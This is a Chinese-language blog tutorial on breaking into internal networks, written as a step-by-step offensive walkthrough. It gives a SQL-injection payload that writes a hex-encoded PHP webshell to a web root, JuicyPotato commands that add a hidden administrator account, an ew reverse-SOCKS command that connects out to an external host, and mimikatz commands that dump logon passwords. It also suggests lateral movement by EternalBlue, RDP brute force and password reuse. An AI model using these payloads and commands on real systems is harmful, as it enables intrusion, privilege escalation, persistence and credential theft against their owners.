内网渗透

内网渗透

我们首先先讲一下,如何去利用sql注入漏洞

先讲两个导出文件的函数

into dumpfile 'C:\\phpstudy\\WWW\\123.txt'//写文件的一个函数,后面接路径
into outfile 'C:\\phpstudy\\WWW\\123.txt'//写文件的一个函数,后面接路径

但是一般都用不了这两个函数,他和loadfile()一起的,如果能用loadfile() ,那代表这两个函数也能用

原因是:mysql.ini的配置问题,要手动添加一个配置

内网渗透_第1张图片

select 1,2,3 into dumpfile 'C:\\Users\\Public\\Music\\WWW\\1.txt'

成功生成这1.txt文件

内网渗透_第2张图片


url编码就是16进制

比如

内网渗透_第3张图片
可以利用上述函数,在url栏,或者burp中,把这个一句话木马写入
!!记住,需要前面加一个0x

select 1,2,0x3c3f706870206576616c28245f524551554553545b385d293f3e into dumpfile 'C:\\Users\\Public\\Music\\WWW\\1.txt'//记住要写两个\\,或者记住要用这个斜杠/

提权

首先:
介绍几条有用的cmd命令:

whoami 查看当前用户权限
netstat -ano   查看本机开放的端口
tasklist 查看本机运行的程序[类似于任务管理器]
systeminfo 查看计算机信息

常见的手法是利用windows的漏洞:

查看windows打了什么补丁,然后对应去找以下提权工具
提权辅助页面: https://bugs.hacking8.com/tiquan/

查看到的补丁号填入,然后点击查询就可以,然后告诉你哪些漏洞可以用,直接去找这个微软编号的利用工具

内网渗透_第4张图片

这里分享一个,我喜欢用的工具叫做烂土豆。juicypotato,关于其中的原理我就不分析了,因为提权工具有各种各样的,而且Windows操作系统的漏洞,如果不是专门研究的,其实不容易分析讲解
下载地址:https://github.com/ohpe/juicy-potato/releases

一般来说Github上面的补丁,会给源码的就不太会有后门。
这个东西百分百报毒,建议虚拟机下载或者是加个信任之类的。[直接怎么免杀,暂时就不考虑]

原版的比较复杂命令,需要写复杂命令:

JuicyPotato.exe -t t -p c:\windows\system32\cmd.exe -l 1111 -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}

里面又是涉及很多东西,而且运行了的cmd,还是出现在管理员界面,去操作特别麻烦,所以我给大家提供魔改版的烂土豆,一条命令就可以了。

JuicyPotato.exe -p "whomai"//""里面输入你想要去执行的命令

内网渗透_第5张图片


下面是详细的提权过程

**1.**直接利用菜刀,拿下权限后,进入虚拟终端,输入这两个命令

JuicyPotato.exe -p "net user nf 密码 /add"//创建用户名
JuicyPotato.exe -p "net localgroup administrators nf /add"//将用户添加到管理员组权限

然后他就添加成功了,成功获取了管理员权限

**2.**然后我们打开远程桌面,尝试进行3389连接

内网渗透_第6张图片

发现和我们这台的网站主机不一样,我们测试的时候,是2008r2的服务器,但是连3389的时候,却是2003r2的服务器

这是因为一个公网ip内存在N多台机器

如何去访问内网端口呢?只能通过端口转发、映射
*
一个网站一般在目标的内网内,然后他开放的端口,是依靠路由器转发出去的,用户访问公网ip的一个端口->然后路由器接受到有人访问了这个端口,根据转发规则分配到内网机器=>内网机器连接
*

我们一般用 netstat -ano 看到的是内网端口

但是如果转发规则里面不转发,我们怎么也访问不到,而且黑路由器也比较难

**所以我们一般会反向连接,来连接我们公网上的一个端口,然后构成连接
**

这里如果有公网ip就不说了,直接全端口映射,所以我们主要讲没公网ip的情况,这里给大家介绍一款白嫖工具
https://qydev.com/index.html
利用花生壳去获取公网ip

内网渗透_第7张图片
然后他会开放一个公网ip的端口,来对应我们本地的一个端口

这样我们就获取到了公网ip

3.
当我们获取了公网ip后,我们可以利用一款工具ew,这是最正统的端口转发、内网穿透
最常用的命令:

建立反向代理 ew -s rssocks -d 1.1.1.1 -e 8888  将自己反向连接到 1.1.1.1的8888端口
JuicyPotato.exe -p "ew -s rssocks -d 1.1.1.1 -e 8888"//利用烂土豆工具进行提权,访问命令
接受代理,ew -s rcsocks -l 1080 -e 8888  监听8888端口,将获取的数据转发到1080端口

内网渗透_第8张图片

当我们连接成功过后,就直接利用Proxifier这个工具
我们进入这个工具
改一个配置就可以了

内网渗透_第9张图片

端口是我们之前监听的那个端口,配置完成,我们就可以直接连接内网啦,可以登陆内网机器的3389了


当我们成功进入内网的时候,我们首先需要做的一件事就是信息收集啦

  1. 我们可以进行端口扫描,上传一个nmap
    然后开始翻一翻本机里面的文件,看看有没有有用的东西
    然后根据端口去寻找问题

  2. 例如我们现在想对10.0.1.5测试,很明显他开了这些端口,就针对这些端口测试。

  3. 例如这里有开放了445端口,445有个内网大杀器永恒之蓝
    开了3389,3389可以尝试爆破登陆,或者打windows rdp漏洞,直接拿下。
    如果有WEB就走WEB测试的道路。

  4. 内网很多情况是这样的,内网很多机器,但是管理员可能就是那么几个人,所以各个机器的用户账号密码相同的可能性极高,那么我们如果能获取本机所有用户的密码,就可以看到管理员原本设置的密码。


最后讲一个工具猕猴桃mimikatz

两条命令
windows2012/2016不能抓

privilege::debug //提升权限
sekurlsa::logonpasswords //从内存中抓取密码
log//将抓取的数据保存到桌面的文件里

你可能感兴趣的:(黑盒测试)